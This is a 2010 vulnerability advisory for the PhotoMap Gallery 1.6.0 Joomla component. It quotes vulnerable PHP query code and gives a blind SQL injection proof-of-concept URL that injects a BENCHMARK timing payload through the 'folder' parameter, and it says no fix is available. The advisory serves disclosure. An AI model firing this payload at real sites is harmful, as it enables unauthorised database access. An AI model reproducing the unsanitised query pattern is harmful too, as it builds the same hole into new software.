PhotoMap Gallery 1.6.0 Joomla Component Multiple Blind SQL Injection Name PhotoMap Gallery Vendor http://extensions.joomla.org/extensions/photos-a-images/photo-gallery/10658 Versions Affected 1.6.0 Author Salvatore Fresta aka Drosophila Website http://www.salvatorefresta.net Contact salvatorefresta [at] gmail [dot] com Date 2010-07-28 X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ PhotoMap Gallery is a gallery component completely integrated into Joomla 1.5.x. Like 'Picasa', 'Flickr', or 'Panoramio', you can easily add geo-tags to your photos so that you can remember exactly where they're from using Google Maps. II. DESCRIPTION _______________ Some parameters are not properly sanitised before being used in SQL queries. III. ANALYSIS _____________ Summary: A) Multiple Blind SQL Injection _______________________________ The parameter id passed to controller.php via POST when view is set to user and task is set to save_usercategory is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The parameter folder passed to imagehandler.php is not properly sanitised before used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The following is the affected code. controller.php (line 1135): function save_usercategory() { // Check for request forgeries JRequest::checkToken() or jexit( 'Invalid Token' ); $user = & JFactory::getUser(); $task = JRequest::getVar('task'); $post = JRequest::get('post'); //perform access checks $isNew = ($post['id']) ? false : true; // $catid = (int) JRequest::getVar('catid', 0); $db =& JFactory::getDBO(); $query = 'SELECT c.id, c.directory' . ' FROM #__g_categories AS c' . ' WHERE c.id = '.$post['id']; imagehandler.php (line 109); function getList() { static $list; // Only process the list once per request if (is_array($list)) { return $list; } // Get folder from request $folder = $this->getState('folder'); $search = $this->getState('search'); $query = 'SELECT *' . ' FROM #__g_categories' . ' WHERE id = '.$folder; IV. SAMPLE CODE _______________ A) Multiple Blind SQL Injection Replace 89eb36eca1919aff534b13b54796c9a4 with your own. PoC - PhotoMap Gallery 1.6.0 Blind SQL Injection
http://site/path/index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL))) V. FIX ______ No fix.